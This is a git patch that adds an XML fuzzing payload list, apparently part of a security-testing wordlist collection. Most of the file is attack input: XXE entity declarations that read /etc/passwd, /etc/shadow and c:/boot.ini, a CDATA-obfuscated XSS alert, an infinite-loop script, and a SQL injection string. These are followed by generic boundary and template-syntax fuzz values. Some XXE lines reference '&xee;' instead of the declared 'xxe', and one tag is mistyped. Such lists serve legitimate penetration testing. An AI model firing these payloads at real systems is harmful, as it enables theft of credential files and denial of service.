From 73c85e7d640def82cae7f9d56da941acd2ba783f Mon Sep 17 00:00:00 2001
From: Jason Haddix <j.haddix56@gmail.com>
Date: Mon, 28 Jul 2014 08:11:08 -0700
Subject: [PATCH] Create XML_FUZZ

---
 Fuzzing/XML_FUZZ | 50 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 Fuzzing/XML_FUZZ

diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ
new file mode 100644
index 0000000..c2223ac
--- /dev/null
+++ b/Fuzzing/XML_FUZZ
@@ -0,0 +1,50 @@
+## After XML Declaration
+
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini">
+]>
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
+]>
+
+
+## Element and Attrib Values
+
+null
+*
+%
+@
+$
+-
++
+;
+:
+0
+-1
+1
+0.1
+0.9
+true
+false
+1.7976931348623157e+308
+5e-324
+0.00005
+5e-10
+&apos;XoiZR
+&quot;XoiZR
+&lt;Tnn96&gt;
+&lt;?Tnn96 ?&gt;
+&lt;? Tnn96 ?&gt;
+&lt;% Tnn96 %&gt;
+&lt;%= Tnn96 %&gt;
+[Tnn96]
+(Tnn96)
+{Tnn96}
+{{Tnn96}}
+{= Tnn96}
+{{= Tnn96}}